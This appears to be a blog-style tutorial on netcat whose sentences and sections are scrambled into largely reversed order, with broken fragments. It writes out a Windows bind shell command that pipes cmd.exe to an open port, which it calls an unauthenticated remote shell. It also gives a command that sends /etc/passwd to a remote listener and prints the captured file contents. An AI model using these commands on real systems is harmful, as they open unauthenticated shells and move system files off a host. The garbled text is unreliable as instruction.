#USING NETCAT WINDOWS WINDOWS#
Microsoft Windows XP (C) Copyright 1985-2001 Microsoft Corp. To start netcat in this way use: C:\netcat>nc -l -p 2222 -e cmd.exe And on a remote machine we can connect and type commands quite easily: # telnet 192.168.0.50 2222 Trying 192.168.0.50. The scary thing about this is that netcat is completely unauthenticated. If you set netcat to redirect input to cmd.exe on a Windows system you effectively have a remote shell. To do this you basically set up netcat as a listener, redirecting all input to a program on the listening machine. Of course the most nefarious use of netcat is to spawn a reverse shell. For instance, if you were to set up a listener on one machine, you could send information to that machine using a generic network communications program, such as telnet. This works well when you want to send information from a system that doesn't have netcat installed on it. Another neat use of netcat is simply as a listener. Returning to the local machine we see: C:\netcat>type log.txt C:\netcat>nc -l -p 2222 > log.txt C:\netcat>type log.txt root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin. Netcat in turn sends the data to 192.168.0.50, port 2222. Next we issue a similar command on the remote machine: # cat /etc/passwd | nc 192.168.0.50 2222 This command reads the contents of the file /etc/passwd and redirects it to netcat. Assuming the workstation is assigned the IP address 192.168.0.50 we use: C:\netcat>nc -l -p 2222 > log.txt To set up netcat listening on port 2222. We redirect the output of netcat to a file so that we can review the results later. Netcat will remain up and listening until it receives an end of file (EOF) delimiter. We start up netcat using the '-l' flag so that it is listening and the '-p' flag to specify what port we want. We have netcat installed on our local workstation and first we need to set up a listener to capture the incoming data.
#USING NETCAT WINDOWS PASSWORD#
For the purposes of our example let's say we wanted to 'export' the password file off of a remote Linux workstation. A simple example will probably serve to demonstrate the modes better.
#USING NETCAT WINDOWS HOW TO#
The two modes are distinct so you must understand how to use netcat before you get started. The client can be used to pipe data off the filesystem out over a port and the listener (or server) can open a port and listen for incoming data. The unix/linux version is available from SourceForge at but is also available with most Linux distributions.
The windows version is available from at. Netcat is available for both windows and *unix systems. Additionally, netcat is an unauthenticated protocol, so it duplicates much of the ease of use that makes TFTP (trivial file transfer protocol) attractive. Moving files to and from hosts without another transport program, such as FPT, SSH or windows filesharing is incredibly useful. At first this seems fairly trivial, but it is extremely useful for transferring files in absence of other utilities.
Netcat listens to traffic on a port and redirects that traffic to output (either standard output or even to a file). Netcat is, as it name suggests, a program utilized to concatenate network traffic. The fact that netcat is a favorite tool among malicious hackers does a great disservice to the tool, but it also demonstrates its utility.
While many admins have heard of netcat, it is usually in the context of detecting rootkits or evidence of intrusion. Netcat is an oft maligned program that can easily be used for many interesting and useful purposes.
0 kommentar(er)
